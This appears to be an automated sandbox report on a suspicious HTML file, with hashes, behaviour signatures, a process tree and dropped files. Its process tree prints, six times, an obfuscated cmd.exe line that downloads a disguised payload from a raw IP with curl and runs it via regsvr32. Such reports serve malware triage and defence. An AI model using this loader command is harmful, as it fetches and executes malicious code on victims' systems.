Analysis

  • max time kernel
    427s
  • max time network
    405s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    04-07-2022 12:25

General

  • Target

    EmergReport_722623.html

  • Size

    6KB

  • MD5

    3dcdd230925500c73cebb38f49944529

  • SHA1

    bb1a4d6d4fc178024b2052cf9b593fcf585a4fad

  • SHA256

    bff5cf2ca7959cd062c426f37c209ba6a92e948a73e897fac30309c956e80c1f

  • SHA512

    a39baac7dee1362db9b894f60161b71b9c7313b876ed86eab8ceb9dd192526fcf6f30875fbcb93d5bf51f3946314cd74f7c6c2218b69590d4fc88e172e219921

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\EmergReport_722623.html
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1980 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1048
  • C:\Program Files\7-Zip\7zG.exe
    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\EmergReport_722623\" -spe -an -ai#7zMap30767:98:7zEvent7277
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1508
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x548
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:792
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
    1⤵
      PID:524
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
      1⤵
        PID:1116
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
        1⤵
          PID:1916
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
          1⤵
            PID:1712
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
            1⤵
              PID:1424
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c set r1=regs&&C:\Windows\system32\curl -s -o C:\Users\Admin\AppData\Local\Temp\butThinkWe.png http://194.36.189.211/likeBeThat.jpg&& call C:\Windows\system32\%r1%vr32 C:\Users\Admin\AppData\Local\Temp\butThinkWe.png
              1⤵
                PID:1616
              • C:\Windows\system32\notepad.exe
                "C:\Windows\system32\notepad.exe"
                1⤵
                  PID:1708
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  1⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2012

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Defense Evasion

                Modify Registry

                2
                T1112

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\D8I13UW4.txt
                  Filesize

                  603B

                  MD5

                  0f41e43dc8a938c9a67cb1d3b0e8ff95

                  SHA1

                  7b42b1bcf6d51e51b783704a24547af82eccb2a3

                  SHA256

                  cf865687b72cc846f550cb29d0aae47ee8ffc0d561b3801d670e4c3eb2652d51

                  SHA512

                  6949b6889ab018cbf620a2e7e6593a81073394adfae1da482b902e936a7ad3e90f2cbcbfa28eaf4240a0844ac13e6d5593ff8c5d8904332a74da644f2f9eff56

                • C:\Users\Admin\Downloads\EmergReport_722623.zip.y4alqdh.partial
                  Filesize

                  1KB

                  MD5

                  4d739d86d31bdd6809db775483b17445

                  SHA1

                  f64542a4d219dbc82a714f24d367eb43ab35e529

                  SHA256

                  a95e23e735e11ac6ad3e030a2eef354c77c4650f9e3bddde0fca39d3b45d0dc3

                  SHA512

                  b536fd4abbd566e4654e14d87f4a784b89000608224ccd12bdfe8165d7018b2a1e08ea9859af3ae70eab105604ae537ed579edc01fb19eb9d3b00ca65f9a4ed7

                • memory/1508-56-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
                  Filesize

                  8KB

                • memory/2012-59-0x000007FEF3820000-0x000007FEF4243000-memory.dmp
                  Filesize

                  10.1MB

                • memory/2012-61-0x0000000002924000-0x0000000002927000-memory.dmp
                  Filesize

                  12KB

                • memory/2012-60-0x000007FEF2CC0000-0x000007FEF381D000-memory.dmp
                  Filesize

                  11.4MB

                • memory/2012-62-0x000000001B700000-0x000000001B9FF000-memory.dmp
                  Filesize

                  3.0MB

                • memory/2012-63-0x000000000292B000-0x000000000294A000-memory.dmp
                  Filesize

                  124KB

                • memory/2012-64-0x0000000002924000-0x0000000002927000-memory.dmp
                  Filesize

                  12KB

                • memory/2012-65-0x000000000292B000-0x000000000294A000-memory.dmp
                  Filesize

                  124KB